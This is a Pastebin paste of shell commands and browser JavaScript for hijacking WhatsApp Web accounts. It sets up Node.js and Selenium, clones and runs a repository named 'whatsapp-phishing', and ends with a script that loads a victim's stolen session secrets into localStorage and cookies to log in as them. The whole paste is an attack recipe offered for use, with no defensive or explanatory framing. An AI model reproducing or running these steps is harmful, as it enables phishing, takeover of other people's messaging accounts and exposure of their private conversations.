Advertisement
limontec

Hack WhatsApp Web comandos

Oct 2nd, 2016
23,451
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. Commands/Comandos:
  2.  
  3. NPM:
  4.  
  5. apt-get install npm
  6.  
  7. ~~~~~~~~~~~~~~~~~~~~
  8.  
  9. NODE.JS:
  10.  
  11. sudo apt-get install python g++ make checkinstall fakeroot
  12.  
  13. src=$(mktemp -d) && cd $src
  14.  
  15. wget -N http://nodejs.org/dist/node-latest.tar.gz
  16.  
  17. tar xzvf node-latest.tar.gz && cd node-v*
  18.  
  19. ./configure
  20.  
  21. sudo fakeroot checkinstall -y --install=no --pkgversion $(echo $(pwd) | sed -n -re's/.+node-v(.+)$/\1/p') make -j$(($(nproc)+1)) install
  22.  
  23. sudo dpkg -i node_*
  24.  
  25. ~~~~~~~~~~~~~~~~~~~~
  26.  
  27. Download Selenium:
  28.  
  29. wget http://selenium-release.storage.googleapis.com/2.53/selenium-server-standalone-2.53.1.jar
  30.  
  31. java -jar selenium-server-standalone-2.53.1.jar
  32.  
  33. ~~~~~~~~~~~~~~~~~~~~
  34.  
  35. Download WhatsApp phishing:
  36.  
  37. git clone https://github.com/Mawalu/whatsapp-phishing.git
  38.  
  39. cd whatsapp-phishing
  40.  
  41. npm install
  42.  
  43. node index.js
  44.  
  45. ~~~~~~~~~~~~~~~~~~
  46. Fork do repositório https://github.com/limontec/whatsapp-phishing
  47. ~~~~~~~~~~~~~~~~~~
  48.  
  49. Web WhatsApp browser commands (comandos no navegador)
  50.  
  51. var t = CONTENT_OF_YOUR_SECRETS_FILE_COLE_A_CHAVE_AQUI
  52.  
  53. function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
  54.  
  55. login(t)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement